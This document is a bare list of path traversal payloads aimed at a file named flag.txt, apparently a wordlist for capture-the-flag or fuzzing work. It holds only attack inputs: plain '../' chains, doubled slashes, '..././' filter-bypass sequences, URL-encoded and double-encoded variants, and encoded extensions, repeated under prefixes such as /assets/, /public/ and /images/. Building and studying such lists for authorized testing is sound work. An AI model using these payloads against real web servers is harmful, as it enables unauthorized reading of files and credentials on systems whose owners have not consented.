../../../../../../../../../../../../../../../../../../../flag.txt
/../../../../../../../../../../../../../../../../../../../flag.txt
////////../../../../../../../../../../../../../../../../../../../flag.txt
/..././/..././/..././/..././/..././/..././/..././/..././/..././flag.txt
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag.txt
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fflag.txt
../../../../../../../../../../../../../../../../../../../flag%2etxt
/../../../../../../../../../../../../../../../../../../../flag%2etxt
////////../../../../../../../../../../../../../../../../../../../flag%2etxt
/..././/..././/..././/..././/..././/..././/..././/..././/..././flag%2etxt
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag%2etxt
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fflag%2etxt
/assets/../../../../../../../../../../../../../../../../../../../flag.txt
/assets//../../../../../../../../../../../../../../../../../../../flag.txt
/assets/////////../../../../../../../../../../../../../../../../../../../flag.txt
/assets//..././/..././/..././/..././/..././/..././/..././/..././/..././flag.txt
/assets/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag.txt
/assets/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fflag.txt
/assets/../../../../../../../../../../../../../../../../../../../flag%2etxt
/assets//../../../../../../../../../../../../../../../../../../../flag%2etxt
/assets/////////../../../../../../../../../../../../../../../../../../../flag%2etxt
/assets//..././/..././/..././/..././/..././/..././/..././/..././/..././flag%2etxt
/assets/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag%2etxt
/assets/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fflag%2etxt
/public/../../../../../../../../../../../../../../../../../../../flag.txt
/public//../../../../../../../../../../../../../../../../../../../flag.txt
/public/////////../../../../../../../../../../../../../../../../../../../flag.txt
/public//..././/..././/..././/..././/..././/..././/..././/..././/..././flag.txt
/public/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag.txt
/public/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fflag.txt
/public/../../../../../../../../../../../../../../../../../../../flag%2etxt
/public//../../../../../../../../../../../../../../../../../../../flag%2etxt
/public/////////../../../../../../../../../../../../../../../../../../../flag%2etxt
/public//..././/..././/..././/..././/..././/..././/..././/..././/..././flag%2etxt
/public/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag%2etxt
/public/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fflag%2etxt
/images/../../../../../../../../../../../../../../../../../../../flag.txt
/images//../../../../../../../../../../../../../../../../../../../flag.txt
/images/////////../../../../../../../../../../../../../../../../../../../flag.txt
/images//..././/..././/..././/..././/..././/..././/..././/..././/..././flag.txt
/images/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag.txt
/images/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fflag.txt
/images/../../../../../../../../../../../../../../../../../../../flag%2etxt
/images//../../../../../../../../../../../../../../../../../../../flag%2etxt
/images/////////../../../../../../../../../../../../../../../../../../../flag%2etxt
/images//..././/..././/..././/..././/..././/..././/..././/..././/..././flag%2etxt
/images/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fflag%2etxt
/images/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fflag%2etxt
